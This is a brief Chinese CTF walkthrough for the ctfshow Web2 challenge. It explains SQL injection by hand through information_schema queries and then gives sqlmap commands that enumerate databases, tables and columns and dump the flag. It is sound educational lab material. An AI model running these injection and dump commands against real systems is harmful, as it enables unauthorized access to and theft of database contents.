Ctfshow-Web-Web2 WP

Ctfshow Web2 手工

1、 尝试万能密码

然后尝试查看显示位

查看当前连接的数据库

查询当前数据库下面的表面名

接下来查询字段名

最后查询flag

上面是手工爆破，要点是查询数据库内的表名和数据库内的字段名

查询数据库内所有表名的语句：
select table_name from information_schema.tables where table_schema=“你想查找的数据库名”
查询表中所有字段的语句：
select column_name from information_schema.columns where table_name=“你想查找的表名”

**

Ctfshow Web2 一把嗦（sqlmap）

**

访问url提交用户名和密码，用burpsuite拦截

将数据包的内容存到一个txt中，这里我取名2.txt

然后用sqlmap爆数据库
语句 sqlmap -r 2.txt -dbs –batch -r指定文件 --batch使用默认方式 -dbs爆库名

看到数据库WEB2，接下来爆表，因为已经知道数据库名是web2，这里就不用—dbs，用-D 指定数据库名
语句 sqlmap -r 2.txt -D web2 -tables –batch -r指定文件 --batch使用默认方式 -tables爆表名

知道数据表之后尝试获取字段，获取表名后用-T表示表
语句：sqlmap -r 2.txt -D web2 -T flag -columns --batch columns表示字段

确定字段为flag之后，字段用-C 表示，获取字段内容是—dump

语句: sqlmap -r 2.txt -D web2 -T flag -C flag --dump

这里就能看到flag了，这里的flag的和手工获取的不一样，是因为换了个环境。思路都是一样的。